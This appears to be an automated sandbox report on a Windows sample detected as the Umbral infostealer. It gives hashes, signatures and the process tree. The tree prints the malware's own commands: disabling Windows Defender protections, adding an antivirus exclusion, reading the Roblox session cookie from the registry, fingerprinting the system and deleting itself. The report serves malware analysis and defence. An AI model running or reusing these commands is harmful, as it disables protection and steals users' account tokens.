Analysis
-
max time kernel
142s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
24-08-2024 08:58
Behavioral task
behavioral1
Sample
cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe
Resource
win7-20240704-en
General
-
Target
cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe
-
Size
229KB
-
MD5
ea031754ac9fe28dbc0c5915cb638e44
-
SHA1
14b2c7b94aefdfc911e26fc5deb6eb8b6d7c0aed
-
SHA256
cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e
-
SHA512
39a0790b3bae0862b1ba87bd6d1165694ba09cfa5104935e00ebaa13924699b2efba92ee6e744d3d820a9c05f80fa41fa1649498dce8f430835e8c6e813c25bb
-
SSDEEP
6144:9loZM9rIkd8g+EtXHkv/iD4RugVzZqStvY5rWWDFZb8e1m7i:foZOL+EP8RugVzZqStvY5rWWD3V
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral2/memory/1300-1-0x0000024FF9DD0000-0x0000024FF9E10000-memory.dmp family_umbral -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid Process 3764 powershell.exe 4068 powershell.exe 960 powershell.exe 4260 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 15 discord.com 14 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 12 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4976 cmd.exe 3412 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2984 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3412 PING.EXE -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4260 powershell.exe 4260 powershell.exe 3764 powershell.exe 3764 powershell.exe 4068 powershell.exe 4068 powershell.exe 1852 powershell.exe 1852 powershell.exe 960 powershell.exe 960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe Token: SeDebugPrivilege 4260 powershell.exe Token: SeDebugPrivilege 3764 powershell.exe Token: SeDebugPrivilege 4068 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe Token: SeIncreaseQuotaPrivilege 4628 wmic.exe Token: SeSecurityPrivilege 4628 wmic.exe Token: SeTakeOwnershipPrivilege 4628 wmic.exe Token: SeLoadDriverPrivilege 4628 wmic.exe Token: SeSystemProfilePrivilege 4628 wmic.exe Token: SeSystemtimePrivilege 4628 wmic.exe Token: SeProfSingleProcessPrivilege 4628 wmic.exe Token: SeIncBasePriorityPrivilege 4628 wmic.exe Token: SeCreatePagefilePrivilege 4628 wmic.exe Token: SeBackupPrivilege 4628 wmic.exe Token: SeRestorePrivilege 4628 wmic.exe Token: SeShutdownPrivilege 4628 wmic.exe Token: SeDebugPrivilege 4628 wmic.exe Token: SeSystemEnvironmentPrivilege 4628 wmic.exe Token: SeRemoteShutdownPrivilege 4628 wmic.exe Token: SeUndockPrivilege 4628 wmic.exe Token: SeManageVolumePrivilege 4628 wmic.exe Token: 33 4628 wmic.exe Token: 34 4628 wmic.exe Token: 35 4628 wmic.exe Token: 36 4628 wmic.exe Token: SeIncreaseQuotaPrivilege 4628 wmic.exe Token: SeSecurityPrivilege 4628 wmic.exe Token: SeTakeOwnershipPrivilege 4628 wmic.exe Token: SeLoadDriverPrivilege 4628 wmic.exe Token: SeSystemProfilePrivilege 4628 wmic.exe Token: SeSystemtimePrivilege 4628 wmic.exe Token: SeProfSingleProcessPrivilege 4628 wmic.exe Token: SeIncBasePriorityPrivilege 4628 wmic.exe Token: SeCreatePagefilePrivilege 4628 wmic.exe Token: SeBackupPrivilege 4628 wmic.exe Token: SeRestorePrivilege 4628 wmic.exe Token: SeShutdownPrivilege 4628 wmic.exe Token: SeDebugPrivilege 4628 wmic.exe Token: SeSystemEnvironmentPrivilege 4628 wmic.exe Token: SeRemoteShutdownPrivilege 4628 wmic.exe Token: SeUndockPrivilege 4628 wmic.exe Token: SeManageVolumePrivilege 4628 wmic.exe Token: 33 4628 wmic.exe Token: 34 4628 wmic.exe Token: 35 4628 wmic.exe Token: 36 4628 wmic.exe Token: SeIncreaseQuotaPrivilege 2620 wmic.exe Token: SeSecurityPrivilege 2620 wmic.exe Token: SeTakeOwnershipPrivilege 2620 wmic.exe Token: SeLoadDriverPrivilege 2620 wmic.exe Token: SeSystemProfilePrivilege 2620 wmic.exe Token: SeSystemtimePrivilege 2620 wmic.exe Token: SeProfSingleProcessPrivilege 2620 wmic.exe Token: SeIncBasePriorityPrivilege 2620 wmic.exe Token: SeCreatePagefilePrivilege 2620 wmic.exe Token: SeBackupPrivilege 2620 wmic.exe Token: SeRestorePrivilege 2620 wmic.exe Token: SeShutdownPrivilege 2620 wmic.exe Token: SeDebugPrivilege 2620 wmic.exe Token: SeSystemEnvironmentPrivilege 2620 wmic.exe Token: SeRemoteShutdownPrivilege 2620 wmic.exe Token: SeUndockPrivilege 2620 wmic.exe Token: SeManageVolumePrivilege 2620 wmic.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 1300 wrote to memory of 2888 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 84 PID 1300 wrote to memory of 2888 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 84 PID 1300 wrote to memory of 4260 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 86 PID 1300 wrote to memory of 4260 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 86 PID 1300 wrote to memory of 3764 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 89 PID 1300 wrote to memory of 3764 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 89 PID 1300 wrote to memory of 4068 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 94 PID 1300 wrote to memory of 4068 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 94 PID 1300 wrote to memory of 1852 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 96 PID 1300 wrote to memory of 1852 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 96 PID 1300 wrote to memory of 4628 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 100 PID 1300 wrote to memory of 4628 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 100 PID 1300 wrote to memory of 2620 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 102 PID 1300 wrote to memory of 2620 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 102 PID 1300 wrote to memory of 3748 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 104 PID 1300 wrote to memory of 3748 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 104 PID 1300 wrote to memory of 960 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 106 PID 1300 wrote to memory of 960 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 106 PID 1300 wrote to memory of 2984 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 108 PID 1300 wrote to memory of 2984 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 108 PID 1300 wrote to memory of 4976 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 110 PID 1300 wrote to memory of 4976 1300 cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe 110 PID 4976 wrote to memory of 3412 4976 cmd.exe 112 PID 4976 wrote to memory of 3412 4976 cmd.exe 112 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2888 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe"C:\Users\Admin\AppData\Local\Temp\cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe"2⤵
- Views/modifies file attributes
PID:2888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3764
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4628
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2620
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:3748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:960
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:2984
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\cfb7119e9b1eea0c3f511fb51952399c3f10edb91e12030e49a30172b0510e7e.exe" && pause2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3412
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
948B
MD5966914e2e771de7a4a57a95b6ecfa8a9
SHA17a32282fd51dd032967ed4d9a40cc57e265aeff2
SHA25698d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba
SHA512dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5
-
Filesize
1KB
MD54950bb37b35849b09a86bc7c01c8952a
SHA1f9650f41d105d3affa7b19d58ab336a92aab4793
SHA2565d139a221345fe53f28d2a772c8e4c8e988925b6fc228c81baa98f824a44c67c
SHA5125b39b845d6d53acd9a20fa1e3e081f7a4c5bbea4641ed53e6d1df8fb245a57e7a659cbdbdfe41ce642b6b2a7ff98b3dd3c9a5bcea7d226cead546d097f361a40
-
Filesize
1KB
MD558b80fe8da7d23cd3c9707f4ce93457e
SHA17d1c58b992631d82cabd38d738ccca072c91c124
SHA2564479db3e2faf952801a1506140f3612e267e9bb4f5d509b0d63204429de8eef3
SHA51282ef5d29aaf46b5fef467185193f03612058c4bbd7b9926293a79c18deefe137811f95dc59feaa649376c8711ca3253177177b538d2d953147db1ed719cba5e8
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82